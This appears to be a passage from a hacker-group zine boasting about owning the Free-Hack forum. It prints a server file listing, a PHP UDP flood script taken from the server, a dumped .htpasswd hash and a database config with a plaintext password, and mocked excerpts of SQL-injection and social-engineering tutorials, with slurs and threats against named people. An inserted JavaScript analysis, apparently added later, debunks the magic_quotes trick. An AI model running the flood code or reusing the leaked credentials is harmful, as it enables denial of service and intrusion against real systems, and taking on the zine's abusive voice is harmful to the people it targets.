  4561. -rw-r--r--  1 freehack freehack  23867 Jan 18  2010 misc.php
  4562. -rw-r--r--  1 freehack freehack  63331 Jan 18  2010 moderation.php
  4563. -rw-r--r--  1 freehack freehack   6756 Jan 18  2010 moderator.php
  4564. -rw-r--r--  1 freehack freehack  18477 Jan 18  2010 newattachment.php
  4565. -rw-r--r--  1 freehack freehack  37104 Jan 18  2010 newreply.php
  4566. -rw-r--r--  1 freehack freehack  18911 Jan 18  2010 newthread.php
  4567. -rw-r--r--  1 freehack freehack   5725 Jan 18  2010 nex_stats_tend_classes.php
  4568. drwxr-xr-x  9 freehack freehack   4096 Nov 25 18:38 nopaste
  4569. -rw-r--r--  1 freehack freehack  12095 Jul 20 15:01 oks.png
  4570. -rw-r--r--  1 freehack freehack  19604 Jan 18  2010 online.php
  4571. -rw-r--r--  1 freehack freehack   7696 Jan 18  2010 payment_gateway.php
  4572. -rw-r--r--  1 freehack freehack  11910 Jan 18  2010 payments.php
  4573. -rw-r--r--  1 freehack freehack   7889 Jan 18  2010 picture.php
  4574. -rw-r--r--  1 freehack freehack  22040 Jan 18  2010 picture_inlinemod.php
  4575. -rw-r--r--  1 freehack freehack  25311 Jan 18  2010 picturecomment.php
  4576. -rw-r--r--  1 freehack freehack  27415 Jan 18  2010 poll.php
  4577. -rw-r--r--  1 freehack freehack  17744 Jan 18  2010 post_thanks.php
  4578. -rw-r--r--  1 freehack freehack   9512 Jan 18  2010 posthistory.php
  4579. -rw-r--r--  1 freehack freehack  74369 Jan 18  2010 postings.php
  4580. -rw-r--r--  1 freehack freehack   4763 Jan 18  2010 pprm.php
  4581. -rw-r--r--  1 freehack freehack   6594 Jan 18  2010 printthread.php
  4582. -rw-r--r--  1 freehack freehack  70748 Jan 18  2010 private.php
  4583. -rw-r--r--  1 freehack freehack 152336 Jan 18  2010 profile.php
  4584. -rw-r--r--  1 freehack freehack   2712 Feb  3  2010 rbs_banner.php
  4585. -rw-r--r--  1 freehack freehack  39751 Jan 18  2010 register.php
  4586. -rw-r--r--  1 freehack freehack   5688 Jan 18  2010 report.php
  4587. -rw-r--r--  1 freehack freehack  13720 Jan 18  2010 reputation.php
  4588. -rw-r--r--  1 freehack freehack 124717 Jan 18  2010 search.php
  4589. -rw-r--r--  1 freehack freehack  20694 Jan 18  2010 sendmessage.php
  4590. -rw-r--r--  1 freehack freehack  10009 Jan 18  2010 showgroups.php
  4591. -rw-r--r--  1 freehack freehack  11374 Jan 18  2010 showpost.php
  4592. -rw-r--r--  1 freehack freehack  73470 Jan 18  2010 showthread.php
  4593. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:59 signaturepics
  4594. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 sitemap
  4595. -rw-r--r--  1 freehack freehack  32848 Jan 18  2010 subscription.php
  4596. -rw-r--r--  1 freehack freehack  51471 Sep 11 14:10 support.php
  4597. -rw-r--r--  1 freehack freehack  13365 Jan 18  2010 tags.php
  4598. -rw-r--r--  1 freehack freehack   8692 Jan 18  2010 threadrate.php
  4599. -rw-r--r--  1 freehack freehack  12415 Jan 18  2010 threadtag.php
  4600. drwxrwxrwx  2 freehack freehack   4096 Dec  8 03:30 tmp
  4601. -rw-r--r--  1 freehack freehack  34512 Jan 18  2010 usercp.php
  4602. -rw-r--r--  1 freehack freehack  19098 Jan 18  2010 usernote.php
  4603. drwxrwxrwx  7 freehack freehack   4096 Nov 14 09:06 vboptimise
  4604. drwxr-xr-x  4 freehack freehack   4096 Dec  4 22:11 vbseo
  4605. -rw-r--r--  1 freehack freehack  45172 Sep 14 01:00 vbseo.php
  4606. drwxr-xr-x  4 freehack freehack   4096 Nov 14 09:14 vbseo_sitemap
  4607. -rw-r--r--  1 freehack freehack   4221 Sep 14 01:00 vbseocp.php
  4608. -rw-r--r--  1 freehack freehack  27357 Jan 18  2010 visitormessage.php
  4609. -rw-r--r--  1 freehack freehack   8431 Jan 18  2010 whoquotedme.php
  4610. -rw-r--r--  1 freehack freehack    334 Oct  7 11:32 x.php
  4611.  
  4612.  
  4613. RETARDED PHP CODE ALERT!
  4614.  
  4615. $ cat x.php
  4616. <?
  4617. if(!$_GET['target'])
  4618. {
  4619.     die('no target ip specified!');
  4620. }
  4621. $target = $_GET['t'];
  4622.  
  4623. $sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
  4624.  
  4625. if(!$sock) die(__LINE__);
  4626.  
  4627. $data='';
  4628. for($i=0;$i<1400;$i++)
  4629. {
  4630.   $data.=chr(rand(0,255));
  4631. }
  4632.  
  4633. while(true)
  4634. {
  4635.   if(!socket_sendto($sock,$data,strlen($data),0,$target,9)) die(__LINE__);
  4636. echo('.');
  4637. }
  4638.  
  4639. ?>
  4640.  
  4641.  
  4642.  
  4643. $ cd 2tgh9322132k322l1sd
  4644.  
  4645. $ ls
  4646. total 252
  4647. drwxr-xr-x 11 508 504  4096 Nov 14 09:24 .
  4648. drwxr-x--- 34 508  99  4096 Dec  4 22:13 ..
  4649. -rw-r--r--  1 508 504   129 Nov 14 09:24 .htaccess
  4650. -rw-r--r--  1 508 504    42 Nov 14 09:24 .htpasswd
  4651. drwxr-xr-x  2 508 504  4096 Nov 14 07:22 ReadMe
  4652. -rw-r--r--  1 508 504  3661 Nov 14 09:20 config.php
  4653. -rw-r--r--  1 508 504 58442 Sep 22  2009 config_overview.php
  4654. drwxr-xr-x  4 508 504  4096 Nov 14 07:16 css
  4655. -rw-r--r--  1 508 504 19372 Sep 22  2009 dump.php
  4656. -rw-r--r--  1 508 504   512 Nov 14 09:20 error_log
  4657. -rw-r--r--  1 508 504 22059 Sep 22  2009 filemanagement.php
  4658. -rw-r--r--  1 508 504   640 Sep 22  2009 help.php
  4659. drwxr-xr-x  2 508 504  4096 Nov 14 07:17 images
  4660. drwxr-xr-x  4 508 504  4096 Nov 14 07:18 inc
  4661. -rw-r--r--  1 508 504   871 Sep 22  2009 index.php
  4662. -rw-r--r--  1 508 504 24781 Sep 22  2009 install.php
  4663. drwxr-xr-x  4 508 504  4096 Nov 14 07:18 js
  4664. drwxr-xr-x 17 508 504  4096 Nov 14 07:22 language
  4665. -rw-r--r--  1 508 504  5461 Sep 22  2009 log.php
  4666. -rw-r--r--  1 508 504  1256 Sep 22  2009 main.php
  4667. -rw-r--r--  1 508 504  3930 Sep 22  2009 menu.php
  4668. drwxr-xr-x  2 508 504  4096 Nov 14 07:22 msd_cron
  4669. -rw-r--r--  1 508 504   776 Sep 22  2009 refresh_dblist.php
  4670. -rw-r--r--  1 508 504 15762 Sep 22  2009 restore.php
  4671. -rw-r--r--  1 508 504 10187 Sep 22  2009 sql.php
  4672. drwxr-xr-x  5 508 504  4096 Nov 14 07:22 tpl
  4673. drwxrwxrwx  5 508 504  4096 Nov 14 09:20 work
  4674.  
  4675. $ cat .htpasswd
  4676. Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1
  4677.  
  4678. $ cat config.php
  4679. <?php
  4680. // MySQL Dumper Configuration
  4681.  
  4682. // Host-Adress, default 'localhost'
  4683. $config['dbhost'] = 'localhost';
  4684. // port - if empty, mysql uses default
  4685. $config['dbport'] = '';
  4686. // socket - if empty, mysql uses default
  4687. $config['dbsocket'] = '';
  4688.  
  4689. // Username
  4690. $config['dbuser'] = 'freehack';
  4691. //User-Pass. For no Password leave empty
  4692. $config['dbpass'] = '7qm#2nwAc$oU';
  4693.  
  4694. //Speed Values between 50 and 1000000
  4695. //use low values if you have bad connection or slow machines
  4696. $config['minspeed']=100;
  4697. $config['maxspeed']=50000;
  4698.  
  4699. // Interface language and style
  4700. $config['language']='en';
  4701. $config['theme']='msd';
  4702.  
  4703. //Shows the Serveradress if 1
  4704. $config['interface_server_caption']=1;
  4705. $config['interface_server_captioncolor']='#ff9966';
  4706. //Position of the Serveradress 0=left, 1=right
  4707. $config['interface_server_caption_position']=0;
  4708.  
  4709. //Height of the SQL-Box in Mini-SQL in pixel
  4710. $config['interface_sqlboxsize']=70;
  4711. $config['interface_table_compact']=0;
  4712.  
  4713. // Determine the maximum Amount for Memory Use in Bytes, 0 for no limit
  4714. $config['memory_limit']=100000;
  4715.  
  4716. // For gz-Compression set to 1, without compression set to 0
  4717. $config['compression']=1;
  4718.  
  4719. //Refreshtime for MySQL processlist in msec, use any value >1000
  4720. $config['processlist_refresh']=3000;
  4721.  
  4722. $config['empty_db_before_restore']=0;
  4723. $config['optimize_tables_beforedump']=1;
  4724. $config['stop_with_error']=1;
  4725.  
  4726. // For sending a mail after backup set send_mail to 1, otherless set to 0
  4727. $config['send_mail']=0;
  4728. // Attach the backup 0=no  1=yes
  4729. $config['send_mail_dump']=0;
  4730. // set the recieve adress for the mail
  4731. $config['email_recipient']='';
  4732. $config['email_recipient_cc']='';
  4733. // set the sender adress (the script)
  4734. $config['email_sender']='';
  4735.  
  4736. //max. Size of Email-Attach, here 3 MB
  4737. $config['email_maxsize1']=3;
  4738. $config['email_maxsize2']=2;
  4739.  
  4740. // FTP Server Configuration for Transfer
  4741. $config['ftp_transfer'][0]=0;
  4742. $config['ftp_timeout'][0]=30;
  4743. $config['ftp_useSSL'][0]=0;
  4744. $config['ftp_mode'][0]=0;
  4745. $config['ftp_server'][0]=''; // Adress of FTP-Server
  4746. $config['ftp_port'][0]='21'; // Port
  4747. $config['ftp_user'][0]=''; // Username
  4748. $config['ftp_pass'][0]=''; // Password
  4749. $config['ftp_dir'][0]=''; // Upload-Directory
  4750.  
  4751. $config['ftp_transfer'][1]=0;
  4752. $config['ftp_timeout'][1]=30;
  4753. $config['ftp_useSSL'][1]=0;
  4754. $config['ftp_mode'][1]=0;
  4755. $config['ftp_server'][1]='';
  4756. $config['ftp_port'][1]='21';
  4757. $config['ftp_user'][1]='';
  4758. $config['ftp_pass'][1]='';
  4759. $config['ftp_dir'][1]='';
  4760.  
  4761. $config['ftp_transfer'][2]=0;
  4762. $config['ftp_timeout'][2]=30;
  4763. $config['ftp_useSSL'][2]=0;
  4764. $config['ftp_mode'][2]=0;
  4765. $config['ftp_server'][2]='';
  4766. $config['ftp_port'][2]='21';
  4767. $config['ftp_user'][2]='';
  4768. $config['ftp_pass'][2]='';
  4769. $config['ftp_dir'][2]='';
  4770.  
  4771. //Multipart 0=off 1=on
  4772. $config['multi_part']=0;
  4773. $config['multipartgroesse1']=1;
  4774. $config['multipartgroesse2']=2;
  4775. $config['multipart_groesse']=0;
  4776.  
  4777. //Auto-Delete 0=off 1=on
  4778. $config['auto_delete']=0;
  4779. $config['max_backup_files']=3;
  4780.  
  4781. //configuration file
  4782. $config['cron_configurationfile']='mysqldumper.conf.php';
  4783. //path to perl, for windows use e.g. C:perlbinperl.exe
  4784. $config['cron_perlpath']='/usr/bin/perl';
  4785. //mailer use sendmail(1) or SMTP(0)
  4786. $config['cron_use_sendmail']=1;
  4787. //path to sendmail
  4788. $sendmail_path=ini_get('sendmail_path');
  4789. $config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem';
  4790.  
  4791. //adress of smtp-server
  4792. $config['cron_smtp']='localhost';
  4793. //smtp-port
  4794. $config['cron_smtp_port']=25;
  4795. $config['cron_extender']=0;
  4796. $config['cron_compression']=1;
  4797. $config['cron_printout']=1;
  4798. $config['cron_completelog']=1;
  4799. $config['cron_comment']='';
  4800. $config['multi_dump']=0;
  4801. $config['logcompression']=1;
  4802. $config['log_maxsize1']=1;
  4803. $config['log_maxsize2']=2;
  4804. $config['log_maxsize']=1048576;
  4805.  
  4806.  
  4807.                ________________________                    
  4808.               |                        |_____    __          
  4809.               | FREE-HACK LIST OF LAME |     |__|  |_________
  4810.               |________________________|     |::|  |        /
  4811.  /\**/\       |                        \.____|::|__|      <  
  4812. ( o_o  )_     |                              \::/  \._______\
  4813.  (u--u   \_)  |                                        
  4814.   (||___   )==\                                        
  4815. ,dP"/b/=( /P"/b\                                        
  4816. |8 || 8\=== || 8                                        
  4817. `b,  ,P  `b,  ,P                                        
  4818.   """`     """`    
  4819.  
  4847.  
  4848. We think that novaca!ne's  magic_quotes bypass is quite representative
  4849. for this group:                                                        
  4850.  
  4851. --snip snip--
  4852.  
  4853. Bypass magic_quotes (novaca!ne)
  4854. magic_quotes is a php setting (php.ini).
  4855. It causes that every ' (single-quote), " (double quote) and  \ (backslash)
  4856. are escaped with a backslash automatically, a weak but well-known securing method.
  4857. This is how to bypass it:
  4858. Use the function called ‘String.fromCharCode()’, you need to translate your MySQL command
  4859. into ASCII (http://www.asciizeichen.de/tabelle.html) and put it input into the handling.
  4860. ‘ OR ‘a’ = ‘a equals
  4861. String.fromCharCode(8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97)
  4862.  
  4863. --snip snip--
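
Added example, not part of the paste or of the quoted tutorial: it decodes the code points listed in the tutorial and runs them through a simplified model of magic_quotes escaping, showing that they are typographic quotes (U+2018/U+2019) which neither the filter nor a SQL string literal treats as a delimiter. `String.fromCharCode()` is a JavaScript function; the helper names, the escaping model and the literal-context model are assumptions made for illustration.

```javascript
// Added example: what do the code points from the quoted tutorial really contain?
// Code points copied exactly as listed in the tutorial.
const QUOTED_CODE_POINTS = [8216, 32, 79, 82, 32, 8216, 97, 8217, 32, 61, 32, 8216, 97];

// Simplified model (assumption) of magic_quotes_gpc, which applied the same
// rule as PHP's addslashes(): backslash-prefix ', ", \ and NUL.
function magicQuotesEscape(input) {
  return input.replace(/['"\\\0]/g, (ch) => (ch === '\0' ? '\\0' : '\\' + ch));
}

// String.fromCharCode is JavaScript; it runs in a browser or Node, not in PHP or MySQL.
function decode(codePoints) {
  return String.fromCharCode(...codePoints);
}

// Count the characters that matter: ASCII quotes/backslashes vs. typographic quotes.
function quoteInventory(s) {
  const inv = { asciiSingle: 0, asciiDouble: 0, backslash: 0, typographic: 0 };
  for (const ch of s) {
    if (ch === "'") inv.asciiSingle++;
    else if (ch === '"') inv.asciiDouble++;
    else if (ch === '\\') inv.backslash++;
    else if ('\u2018\u2019\u201C\u201D'.includes(ch)) inv.typographic++;
  }
  return inv;
}

// Simplified model (assumption: MySQL default SQL mode) of a value placed inside
// a '...' literal: only an unescaped ASCII apostrophe ends the literal.
function closesSqlStringLiteral(value) {
  for (let i = 0; i < value.length; i++) {
    if (value[i] === '\\') { i++; continue; }          // backslash escapes next char
    if (value[i] === "'") {
      if (value[i + 1] === "'") { i++; continue; }     // doubled '' is an escaped quote
      return true;
    }
  }
  return false;
}

function analyze(codePoints) {
  const decoded = decode(codePoints);
  const escaped = magicQuotesEscape(decoded);
  return {
    decoded,
    inventory: quoteInventory(decoded),
    changedByEscaping: escaped !== decoded,   // did the filter touch anything?
    closesLiteral: closesSqlStringLiteral(escaped),
  };
}

const result = analyze(QUOTED_CODE_POINTS);
console.log(result);

// Contrast with a constructed ASCII version of the same text: the filter escapes
// every apostrophe, so the value stays inside the string literal.
const asciiVersion = "' OR 'a' = 'a";
console.log(magicQuotesEscape(asciiVersion));
console.log(closesSqlStringLiteral(magicQuotesEscape(asciiVersion)));
```

The decoded string contains no ASCII apostrophe at all, so the escaping has nothing to act on and the value stays inert inside the literal; the listed code points encode word-processor quotes, not SQL syntax.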
  4864.  
  4865. novaca!ne is (next  to fred777) of course, our new security superhero!
  4866. Congratz, faggot...                                                  
  4867.                                                                      
  4868. Finally we shouldn't forget our old fag superhero fred777, who  helped
  4869. us to understand how we could get every source code of  a  page.  This
  4870. sounds pretty hard, but fred777 shows his priv8  techniques  (we  fear
  4871. them):                                                                
  4872.  
  4873. --snip snip--
  4874. #########################################################
  4875. #     Sourcecode disclosure by social engineering        
  4876. #                   tested on NPD                        
  4877. #########################################################
  4878.  
  4879. Intro:
  4880. Here I describe a case that I had in front of me
  4881. recently. By chance I was once again on the many
  4882. NPD sites, looking for holes.
  4883. On one subpage I did find something, or at least it
  4884. looked as if there was an SQL injection there.
  4885.  
  4886. As soon as the limit parameter was passed incorrectly, the
  4887. usual SQL error appeared:
  4888.  
  4889. ---------------------------------------------------------
  4890.  
  4891. Logically, the query looked like this:
  4892.  
  4893. SELECT `cats` FROM fred (sonstiges) LIMIT $_GET['la'],10;
  4894.  
  4895. When I then tried to extend the query with UNION using a
  4896. script, it would not work.
  4897. Of course there could be a number of reasons for that, but
  4898. I would have loved to look at the source + queries.
  4899.  
  4900. ---------------------------------------------------------
  4901.  
  4902. Why not, actually?
  4903.  
  4904. After some consideration, I wrote a mail to the
  4905. webmaster of the site, with the aim of getting him to send me the source.
  4906.  
  4907. --snip snip--
  4908.  
  4909. What we learned is:                                                  
  4910. - If we write an email to an admin we always get the source code      
  4911. - fred777 uses tools to exploit some sql injection                    
  4912.                                                                      
  4913. "o_O", one of the banned users puts it nicely: "being lame is  one  of
  4914. fred777's master skills" Just to inform you: We owned  Free-Hack  with
  4915. this technique of course.                                            
  4916.                                                                      
  4917. TIME FOR SOME                                                        
  4918. ______________________________________________________________________
  4919. IlapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapsI
  4920. Isl_______l__slapslapslapsla_______a__lap__apslapslapslaps__pslap__apI
  4921. Ip|     __|  |.---.-.-----.|   _   |  |_|  |_.---.-.----.|  |--.|  |aI
  4922. Ia|__     |  ||  _  |  _  ||       |   _|   _|  _  |  __||    < |__|lI
  4923. Il|_______|__||___._|   __||___|___|____|____|___._|____||__|__||__|sI
  4924. Islapslapslapslapsla|__|pslapslapslapslapslapslapslapslapslapslapslapI
  4925. IpslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslapslaI
  4926.                                                                      
  4927. Right, who deserves it? Correct! Suicide and  enco  for  being  badass
  4928. super high skilled computer professionals    ...    NOT              
  4929.                                                                      
  4930. This is a warning Free-Hack. Continue existing and  we  will  show  no
  4931. mercy. Especially you, J0hn.X3r. Take your chance, go and grow up.    
  4932.  
  4933. ,_._._._._._._._|____________________________________________________
  4934. |_|_|_|_|_|_|_|_|___________________________________________________/
  4935.  ~ last words ~ !                                                    
  4936.                                                                      
  4937. That's all for now. We hope that those we have  owned  understood  the
  4938. warning and that those who already enjoyed issue  one  were  satisfied
  4939. with this release. We will take a little  break  for  now  and  go  to
  4940. Hawaii to get our asses drunk. But do not fear. There will  always  be
  4941. enough time for us to audit more code, write more 0day  and  own  more
  4942. idiots. We will always watch the scene and act if we are needed. There
  4943. is still a lot to do and the winter of hax is  not  over  yet.  So  do
  4944. expect us.                                                            
  4945.                                                                      
  4946.                                 |\                                    
  4947.                                /()/                                  
  4948.                                 \|                  - the happy ninjas
  4949.  ____________________________________________________|_._._._._._._._,
  4950.  \___________________________________________________|_|_|_|_|_|_|_|_|
  4951.                                                      !   ~ OUTRO ~    
  4952.               ,                                                      
  4953.     .         |                                                      
  4954.                     /                                                
  4955.       \       I                                                      
  4956.                   /                                                  
  4957.         \  .g88R_                                                    
  4958.           d888(`  ).                   _                              
  4959.  -  --==, 888(     ),=--           .+(`  )`.                          
  4960. )         Y8P(       '`,          :(   .    )                        
  4961.         .+(`(      ,   )     .--  `.  (    ) )                        
  4962.        ((    (..__,:'-'   .=(   )   ` _`  ) )                        
  4963. `.     `(       ) )       (   ,  )     (   )  ._                      
  4964.   )      ` __.:'   )     (   (   ))     `-',:ccee88oo,                
  4965. )  )  ( )       --'       `- __,'        ccC8O8O8Q8PoOb.o8oo          
  4966. .-'  (_,'          ,')                 pqdOB69QOFFE4OpugoO9bD        
  4967.                  .(_  )              CgggbbU8OU qOp qOdoUOdcb,        
  4968.                      . ,                 .3X4X5U2M/p u gcoUodpP      
  4969.                                               .\\\//  /douUP          
  4970. And shepherds we shall be, for thee my Lord for \\\////.       (´`)  
  4971. thee,  power hath descended forth from thy hand, |||||.     ,.(´ -.),.
  4972. that our feet may swiftly carry out thy command. |||/\,     (  ,   ,)
  4973. We shall flow a river forth to thee, and teeming |||\/.      `-´`´`´.
  4974. with souls  shall it  ever be. In nomine patris, |||||.              
  4975. et filii, et spiritus sancti   ,..,,.,.,....,,,,//||||\...,,,,        
  4976. ,...,...,..,...,,..,,.,.,..,,.,,,.,,,,,,,..,.,,,,...,.,.,...,,..,.    
  4977. .,.,,,,..,..,.,..,,,,.,..,.,,.,..,..,,,,.,...,,..,,,..,..,....,..,..,.
  4978.